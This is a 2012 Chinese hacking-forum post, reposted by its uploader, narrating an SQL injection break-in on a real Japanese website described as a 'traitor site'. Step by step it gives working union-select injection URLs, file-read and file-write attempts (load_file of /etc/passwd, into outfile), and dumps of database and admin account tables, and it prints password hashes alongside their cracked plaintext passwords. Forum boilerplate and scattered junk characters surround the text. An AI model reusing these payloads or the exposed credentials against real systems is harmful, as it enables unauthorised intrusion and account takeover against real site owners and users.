找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3219|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

% \7 q9 Y1 n  w2 R. g) P* T4 D( Y3 P- v( r6 i# m+ L' N
0x01. 检测 www.zuaa.jp 收集数据' l* B& h8 |( V9 f1 }# j

$ X/ n  |2 g3 U# i$ u: p& Q4 _2 {! }# ?
whatweb
$ R/ r+ t3 F. q8 i* \; K5 x" d) l+ s
% F) i# a' @- P
9 L3 N* e' ~+ I- q8 ^& Q利用NMAP扫描
2 C* y$ D' Y4 x8 w7 y3 v0 L) |0 @) T  k3 s" X3 q5 d) e
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持9 _7 `* E1 E2 f) ~# i
0x02.找注入点
, q! s# y# Q! u0 c% `/ F9 [找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
* n6 A' z: ^8 m0 |7 i  ]* o9 `- e* O, L# y+ M% r5 m" R+ R; A" Q/ j2 Q

% _  n' L' q$ E4 a* Z$ q0x03.order by) g" g1 ~: |1 C* y
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
. X7 ?. j7 W5 H
4 V1 o' s& a5 q' \" t6 T8 S( H, }order by 28报错,order by 27正常
# z# N/ V1 p; g
' _/ E" {( E$ ]0 B5 n4 [0x04.   union手动查询
, B( L6 R! v$ ]4 A6 }3 fhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 1 w) I) ]4 t  A7 P) C' ?7 L
添加到 27 时正常显示
' c* J8 K  g. e- j$ p$ M1 @) ^( J  Y9 i& r! J/ {
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# i) U2 g$ S; T# J) q
* s8 m) D: M# Q- b+ R% V
0x05. info:
" {0 b8 v. X+ h9 A" Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% z& p6 b; ]  b5 y' T+ q' b5 Z% L3 q! |) I
user:            root@localhost
' s2 N' a9 p9 Bdatabase:    openpne9 g* d# w5 y" o2 R3 s$ Q! U$ w
version:      4.1.22
7 y& C; D  u2 W) s2 _os:             portbld-freebsd5.4% a5 f+ Q& a& E. y
- ^! m0 l: y! n; O
0x06. root用户
4 n7 g7 p6 V6 C  S- n9 R利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
# b# |7 w9 H- w7 m/ S& c; Q; _/ ~http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 1 t  u# j7 N8 m' q

, Q) o/ U  N/ a. @0 d7 X1 e) C通过工具转换
5 q$ j' |* x' k/ E  m  \# i4 s, ^! y& `/ f3 J" o( }+ o5 }" t, I# Z
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持8 h* h: L( C$ N5 j' e

( C2 q9 M1 B4 p- E; `0x07. 利用 into outfile7 C& P4 ]" K6 h4 w
全部都失败
  N' `" X3 O: I7 o* N& Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
) v  L' M; |2 i- C; b* i6 E9 w+ _. ~- y# W* o# G; D# L
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
' e7 s  V2 g: F) G6 @" D* ^8 J+ C( V& n' x
页面显示“MDB2 Error:syntax error”
' @, F" j- |9 B% G& i; x9 p9 @
) d6 y' j- F. [# S9 {2 e. q2 |0 s0x08. 利用 mysql 4.1
" i6 p  q. {/ b) M" S/ C猜常规表名,字段未果 工具 sqlmap
  Y: y' e: N5 k! q, X! `中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持% Q. H8 ^$ p: x
8 A& ^/ J( T6 B* m
% k; v% }4 s0 y5 ~" F% u
) \. V; h1 U8 |' Z/ c9 m
0x09. 查找后台8 Q% T1 e) P: Q
利用 现有的各种 后台工具尝试都不行
" T# _' F! j' K- ^; J/ V" z+ H& ^+ K$ T7 d7 m! {; N
0x10.  MySL外联方法/ \( }3 ?# D3 P: A$ x) }9 B* @6 q
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
. n7 B+ R: O  q* l, Q! _% o6 y可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
  A) g  b1 P: P0 A5 I4 r& s8 D& fhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
% j" N% d8 C* j7 _! r- V4 y0 a3 z+ y
& H- y$ R0 Q3 Z! e2 H这个可以在 www.cmd5.com 解密
3 ]4 \1 a# E) H( c7 ~root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
7 L. Z3 O( X7 ?. ?0 u* }" Fchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97( ]9 ^7 l% U4 i& E+ J; \# \; ?- g
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???( _( g2 t; Y7 ~
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
% b; A0 F- ^/ y0 y+ Y) J' g5 F/ n: _工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知/ V+ K5 c7 u7 u: F, H5 y  z2 q2 T+ m

+ v1 @+ H& ^- t5 v/ {. c# |8 X' y0 v6 a0 a# l. ~2 U- F
0x11. 网站突破
+ X8 J" f6 O! d+ O( j! x( v发现网站的源程序 openpne, google 下载 openpne 源码& a0 X  [3 v  V1 Y

  F" F- I: \# w$ C8 s) r" P9 ^. C* A7 c- l/ t! ^
0x12. 默认信息利用! F6 c) @* K* r$ ~( y
http://sns.zuaa.jp/?m=admin&a=page_login( H9 B# ^$ |7 W, m/ u& @5 e9 ~- H

( E) G) r, C3 z  `6 F6 J表名 (c_admin_user) ,字段名(username,password)
9 z/ s- u6 S8 j( Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user& k! }* a8 ~7 U6 ?0 z0 ~7 [) p2 {

# p; W& F0 V" s解密
  `5 X& O( a7 U1 ?3 d' ozuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009* N2 s6 X. y$ Q6 R2 y- w
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
! K  o2 a3 y6 A) `2 _( \8 q
- s" U* V/ E5 v! X/ h/ P0 D1 S中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ X8 s; M1 [8 x

+ j. G2 e) t4 e. x, m0x13. 登录后台1 ^7 ?0 Y  g+ p4 z

( u% Z. {5 a5 w4 s8 ^. j# F5 U: p) }8 Z+ }/ a1 x& W( T

$ i& p6 D& t" g" n. g+ Y2 ?2 ]0x14. 小结
( U/ v( z6 q, E% E0 a% v利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。+ ^1 m! Y% r& Y- i2 }" s  @) N: ], v
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
' b# o0 ^3 _/ S0 _$ M------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain5 S) q1 B) `& [- q3 ?+ i& U
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
& e1 v* r) O+ {# o
$ Z3 ?8 e8 Y  w0 x最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
4 \! P- V; @0 ^' a2 {8 ]6 R: [

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表